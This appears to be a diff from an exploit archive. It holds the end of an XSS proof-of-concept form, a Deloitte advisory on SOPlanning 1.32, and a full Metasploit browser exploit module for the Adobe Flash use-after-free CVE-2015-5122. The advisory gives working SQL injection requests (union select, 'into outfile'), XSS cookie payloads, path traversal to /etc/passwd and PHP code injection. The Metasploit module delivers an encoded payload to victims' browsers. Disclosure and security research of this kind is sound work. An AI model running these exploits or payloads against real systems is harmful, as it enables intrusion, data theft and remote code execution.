<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message
has been sent:<%INFO%>&lt;/textarea&gt;<script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message.
We will reply you as soon as possible.This is a copy of the data
sent:<%INFO%>Best Regards.&lt;/textarea&gt;<script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>
## Solution:
Upgrade to v1.1.6
## Disclosure Timeline:
2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

156
platforms/php/webapps/37604.txt Executable file
View file

@ -0,0 +1,156 @@
SOPlanning - Simple Online Planning Tool multiple vulnerabilities
CVEs: CVE-2014-8673, CVE-2014-8674, CVE-2014-8675, CVE-2014-8676, CVE-2014-8677
Vendor: http://www.soplanning.org/
Product: SOPlanning - Simple Online Planning
Version affected: 1.32 and prior
Product description:
SO Planning is an open source online planning tool completely free, designed to easily plan projects / tasks online, in order to manage and define work for a whole team. (from http://www.soplanning.org/en/index.php)
Advisory introduction:
Soplanning version 1.32 is susceptible to multiple vulnerabilities, including SQLi, XSS, path traversal, authentication information disclosure, PHP code injection.
Credit: Huy-Ngoc DAU of Deloitte Conseil, France
================================
Finding 1: Soplanning multiple SQL injection vulnerabilities (CVE-2014-8673)
================================
- SQLi in planning.php
The project, user, task filters are prone to SQLi due to lack of user input sanitization.
POC :
POST /process/planning.php HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 141
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/planning.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4,vi;q=0.2
Cookie: soplanning=[VALID SESSION COOKIE]; inverserUsersProjets=1
filtreGroupeProjet=1&projet_anything=anything') union all select 111,table_name,333,444,555,666,777,888,999 from information_schema.tables#
The query's results can be retrieved by accessing http://localhost/export_csv.php
- order by statement blind SQLi in user_list.php, projets.php, user_groupes.php, groupe_list.php
POC:
http://localhost/user_list.php?page=1&order=1,1&by=
http://localhost/projets.php?order=1,0&by=
http://localhost/user_groupes.php?page=1&order=1,(select%20case%20when%20(1=1)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=
http://localhost/groupe_list.php?page=1&order=1,(select%20case%20when%20(1=0)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=
- triPlanning GET parameter Blind SQLi in process/planning.php
POC:
http://localhost/process/planning.php?triPlanning=1,1
and
http://localhost/process/planning.php?triPlanning=1,0
(don't follow redirection back to ../planning.php where the sanitization is done)
The differences of TRUE and FALSE can be observed by accessing http://localhost/export_pdf.php?debug=1
- SQLi in LIMIT statement in nb_lignes cookie
POC: set the following cookie :
nb_lignes=20 into outfile '/tmp/poc_soplanning.txt'
and visit http://localhost/process/planning.php
Sample file output content:
ADM \N admin admin df5b909019c9b1659e86e0d6bf8da81d6fa3499e \N oui 000000 ["users_manage_all", "projects_manage_all", "projectgroups_manage_all", "tasks_modify_all", "tasks_view_all_projects", "parameters_all"] [md5] non \N
- insecure use of addslashes function to protect against SQLi
Soplanning sanitizes user input to protect against SQLi by using PHP addslashes() function. However, this function is known to be unsafe. Instead, mysql_real_escape_string() should be used.
================================
Finding 2: Soplanning multiple XSS vulnerabilities (CVE-2014-8674)
================================
- XSS via cookie manipulation in unauthenticated mode (nb_mois, nb_lignes)
This vulnerable allows for an attacker having physical access to a user's browser even in unauthenticated mode to steal the user's authenticated cookie.
POC:
Disconnect active user session
At authentication page, set the following cookie: nb_mois="><script>alert(document.cookie)</script><"
Login with any valid user account, an alert message will show the cookies.
- Stored XSS in calender export functions
Export functions offer a "debug" mode which outputs HTML instead of formatted content (pdf, ical). This mode can be activated by setting the "debug" GET parameter. However, by injecting malicious HTML code into a project name for example, it is possible to conduct XSS attacks.
POC:
Create a new project with the name <script>alert(1);</script>
Access http://localhost/export_pdf.php?debug=1
================================
Finding 3: Soplanning authentication hash disclosure via GET URL in ICAL calender sharing function (CVE-2014-8675)
================================
Soplanning allows for an ICAL calendar to be shared/used elsewhere. However, the link is generated statically using authentication information.
Sample generated link:
http://localhost/export_ical.php?login=admin&hash=61b9bab17cdab06e759f2d11ee11afab
An offline brute force attack can thus be conducted to find the user's password: hash = md5($user->login . '¤¤' . $user->password);
================================
Finding 4: Soplanning path traversal in Holidays calender import function (CVE-2014-8676)
================================
If error messages are activated, the vulnerability allows to detect existence of a remote arbitrary file.
POC:
http://localhost/process/feries.php?fichier=../../../../../../../etc/passwd
Sample error output when file does not exist:
Warning: file_get_contents(../../holidays/../../etc/passwd) [function.file-get-contents]: failed to open stream: No such file or directory in /[PATH]/includes/class_vcalendar.inc on line 1665
However, it is not possible to retrieve file content or conduct further attack using this vulnerability.
================================
Finding 5: Soplanning PHP code injection in installation process (CVE-2014-8677)
================================
The installation process is prone to PHP code execution vulnerability.
POC:
- Go to http://localhost/install
- Enter valid database credentials and host information. The database name is as follows :
so';phpinfo();//
- The next page will show the phpinfo() results
It should be noted that in order for the attack to work, the attacker must prepare his own database server and the database user must either have access to a real database named "so';phpinfo();//", or have privileges to create any database.
For installed instances of Soplanning, the attack is also possible (i.e. the installing interface is accessible) if:
- PHP version is older than 5.2
- Configured database server is (temporarily or not) down
- The directory smarty/templates_c is not writable
================================
Timeline:
03/08/2014 - Vulnerability discovered
11/08/2014 - Vendor notified
14/08/2014 - Vendor confirmed
09/09/2014 - Patch released
References:
Soplanning changelog : http://www.soplanning.org/en/download.php
About Deloitte:
Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. In France, Deloitte SAS is the member firm of Deloitte Touche Tohmatsu Limited, and professional services are provided by its subsidiaries and affiliates.
Our Enterprise Risk Services practice is made up of over 11,000 professionals providing services relating to security, privacy & resilience; data governance and analytics; information and controls assurance; risk management technologies; and technology risk & governance. We help organizations build value by taking a "Risk Intelligent" approach to managing financial, technology, and business risks.
Huy-Ngoc DAU
Senior Consultant | IT Advisory
Deloitte Conseil
185, avenue Charles de Gaulle, Neuilly-sur-Seine, 92200, France
Mobile: +33 (0)6 70 97 91 95 Tel: +33 (0)1 58 37 03 72
hdau@deloitte.fr<mailto:hdau@deloitte.fr> | www.deloitte.fr<www.deloitte.com>
Avant d'imprimer, pensez à l'environnement

30
platforms/windows/dos/37593.py Executable file
View file

File diff suppressed because one or more lines are too long

144
platforms/windows/remote/37599.rb Executable file
View file

@ -0,0 +1,144 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash opaqueBackground Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling the opaqueBackground property
7 setter of the flash.display.DisplayObject class. This module is an early release
tested on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
windows 8.1, Firefox and Adobe Flash 18.0.0.203,
Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
Windows 8.1, Firefox and Adobe Flash 18.0.0.194
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovered on HackingTeam info leak
'juan vazquez', # Ported to Msf
'sinn3r' # Testing and some editing
],
'References' =>
[
['CVE', '2015-5122'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
print_warning("Target setup not supported")
send_not_found(cli)
return
end
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end